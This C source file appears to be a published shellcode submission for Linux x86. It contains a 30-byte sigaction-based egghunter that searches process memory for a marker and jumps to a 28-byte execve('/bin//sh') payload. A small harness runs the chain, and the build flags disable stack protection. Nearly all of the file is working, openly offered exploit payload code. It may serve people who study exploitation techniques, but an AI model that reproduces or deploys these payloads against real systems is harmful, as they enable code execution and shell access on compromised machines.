/*
Title   : egghunter shellcode
        : hunter (30 bytes), marker (8 bytes), shellcode (28 bytes)
Date    : 28 May 2013
Author  : Russell Willis <[email protected]>
Testd on: Linux/x86 (SMP Debian 3.2.41-2 i686)

Comments:
    Using sigaction system call for hunter code for robust operation.
    Based on paper 'Safely Searching Process Virtual Address Space'.
    This is a must read paper, instructive and inspiring, found here:
    http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf
    see section 3.1.3 sigaction(2), page 13.
    
    To build:
    gcc -fno-stack-protector -z execstack egghunter.c -o egghunter
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

/*
 * Marker code must be executable, currently:
 *   /x90 nop
 *   /x50 push eax
 */ 
#define MARKER "\x90\x50" 

char hunter[] = 
    "\x66\x81\xc9\xff\x0f\x41\x6a\x43\x58\xcd\x80\x3c\xf2\x74\xf1"
    "\xb8"MARKER""MARKER"\x89\xcf\xaf\x75\xec\xaf\x75\xe9\xff\xe7";
char marker[] = MARKER; 
char shellcode[] = 
    "\x31\xc0\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69"
    "\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xb0\x0b\xcd\x80";
 
int 
main(void) 
{
    int i=0, nmarkers = 4, markerlen = sizeof(marker)-1;
    /* 
     * Setup area of memory for testing,
     * place marker and shellcode into area.
     */ 
    char *egg = malloc(128);
    memcpy(egg+(markerlen*nmarkers), shellcode, sizeof(shellcode)-1);
    do {
      memcpy(egg+i, marker, markerlen);
      i += markerlen;
    } while(i != (markerlen * nmarkers));
    /*
     * Run hunter to search for marker and jump to shellcode 
     */
    int (*ret)() = (int(*)())hunter;
    ret();
    free(egg);
    return 0;
}